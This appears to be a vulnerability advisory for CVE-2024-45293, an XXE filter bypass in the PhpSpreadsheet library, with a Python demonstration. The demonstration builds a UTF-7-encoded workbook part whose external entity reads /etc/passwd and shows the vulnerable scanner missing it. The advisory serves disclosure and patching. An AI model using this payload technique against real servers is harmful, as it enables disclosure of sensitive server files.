CVE-2024-45293

CVSS 3.1 Score 7.5 of 10 (high)

Details

Published: Oct 7, 2024
Updated: Mar 7, 2025
CWE ID: 611 (Improper Restriction of XML External Entity Reference)

Summary

CVE-2024-45293 is a vulnerability in the PhpSpreadsheet library (PHPOffice) that lets an attacker bypass its XML External Entity (XXE) protection. By placing whitespace around the `=` of the `encoding` attribute in the XML declaration, an attacker can craft an Excel (XLSX) workbook that discloses sensitive files from any server that opens it with PhpSpreadsheet. The library's security scan in XmlScanner.php sniffs the declared encoding with a pattern that does not tolerate that whitespace; when the pattern fails to match, the scanner falls back to UTF-8 and skips the conversion step that would normally expose a foreign-encoded payload. The check for `<!DOCTYPE` therefore runs over the raw bytes of a UTF-7 encoded document, in which the keyword never appears literally, while the XML parser, which does honour the declaration, decodes the UTF-7 body and resolves the external entity. Users should upgrade to PhpSpreadsheet 1.29.1, 2.1.1 or 2.3.0; there are currently no known workarounds.
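The bypass described above, modelled in Python as an added example. This is not PhpSpreadsheet's code: the two regular expressions stand in for the library's encoding sniff before and after the fix, `doctype_detected` models its scan, and the workbook fragment, the `file:///etc/passwd` path and the hand-rolled UTF-7 encoder are constructed for the demonstration (Python's own `utf-7` codec writes `<` and `!` literally, which is not how an attacker would encode them).

```python
import base64
import re

# RFC 2152 "Set D" plus the whitespace characters that may always be written directly.
UTF7_DIRECT = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'(),-./:? \t\r\n"
)


def utf7_encode(text: str) -> bytes:
    """Encode text as UTF-7, base64-encoding every optional ("Set O") character.

    RFC 2152 allows '<', '!', '"', '[' etc. to be written either literally or
    inside a '+...-' modified-base64 shift sequence; decoders must accept both.
    Emitting them as '+ADwAIQ-' keeps '<!DOCTYPE' out of the raw byte stream.
    """
    out = bytearray()
    run = []

    def flush() -> None:
        if run:
            b64 = base64.b64encode("".join(run).encode("utf-16-be")).rstrip(b"=")
            out.extend(b"+" + b64 + b"-")
            run.clear()

    for ch in text:
        if ch == "+":
            flush()
            out.extend(b"+-")  # a literal '+' is escaped as '+-'
        elif ch in UTF7_DIRECT:
            flush()
            out.extend(ch.encode("ascii"))
        else:
            run.append(ch)
    flush()
    return bytes(out)


# Model of the encoding sniff (not PhpSpreadsheet's source): the vulnerable form
# only matches encoding="..." with no whitespace around '='; the fixed form
# tolerates whitespace, as the XML specification (and therefore libxml) does.
ENCODING_RE_VULNERABLE = re.compile(rb'encoding="([^"]*)"')
ENCODING_RE_FIXED = re.compile(rb'encoding\s*=\s*"([^"]*)"')
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def find_charset(xml: bytes, encoding_re) -> str:
    """Return the declared charset, defaulting to UTF-8 when the pattern misses."""
    m = encoding_re.search(xml)
    return m.group(1).decode("ascii", "replace").upper() if m else "UTF-8"


def doctype_detected(xml: bytes, encoding_re) -> bool:
    """Convert to UTF-8 according to the sniffed charset, then look for <!DOCTYPE.

    Returns True when the scanner would reject the document. If the charset is
    sniffed as UTF-8 no conversion happens and the raw bytes are scanned.
    """
    charset = find_charset(xml, encoding_re)
    if charset != "UTF-8":
        try:
            xml = xml.decode(charset).encode("utf-8")
        except (LookupError, UnicodeDecodeError):
            return True  # unknown or undecodable charset: treat as hostile
    return DOCTYPE_RE.search(xml) is not None


def build_xxe_part(declaration: bytes) -> bytes:
    """Constructed XLSX XML part (think xl/workbook.xml) with an external-entity
    DOCTYPE, body written in UTF-7. The file path is a demonstration placeholder."""
    body = (
        '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
        '<workbook><sheets><sheet name="&xxe;"/></sheets></workbook>\n'
    )
    return declaration + utf7_encode(body)


# Whitespace around '=' is legal XML; the parser still switches to UTF-7.
SPACED_DECL = b'<?xml version="1.0" encoding = "UTF-7"?>\n'
PLAIN_DECL = b'<?xml version="1.0" encoding="UTF-7"?>\n'


def run_comparison() -> dict:
    spaced = build_xxe_part(SPACED_DECL)
    plain = build_xxe_part(PLAIN_DECL)
    return {
        # The keyword never appears literally in the bytes the scanner sees...
        "literal_doctype_in_bytes": b"<!DOCTYPE" in spaced,
        # ...but a parser honouring the declared UTF-7 sees it plainly.
        "doctype_after_utf7_decode": "<!DOCTYPE" in spaced.decode("utf-7"),
        "vulnerable_check_spaced": doctype_detected(spaced, ENCODING_RE_VULNERABLE),
        "fixed_check_spaced": doctype_detected(spaced, ENCODING_RE_FIXED),
        # Without the whitespace trick even the vulnerable sniff converts and catches it.
        "vulnerable_check_plain": doctype_detected(plain, ENCODING_RE_VULNERABLE),
    }


if __name__ == "__main__":
    for name, value in run_comparison().items():
        print(f"{name}: {value}")
```

The comparison isolates the two ingredients: the whitespace makes the vulnerable sniff fall back to UTF-8 and skip conversion, and UTF-7 keeps `<!DOCTYPE` out of the raw bytes, so the byte-level scan passes while the real XML parser decodes the body and would resolve the entity. Remove either ingredient and the scan catches the document.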



Affected Products

  • PHPOffice PhpSpreadsheet

Affected Vendors

  • PHPOffice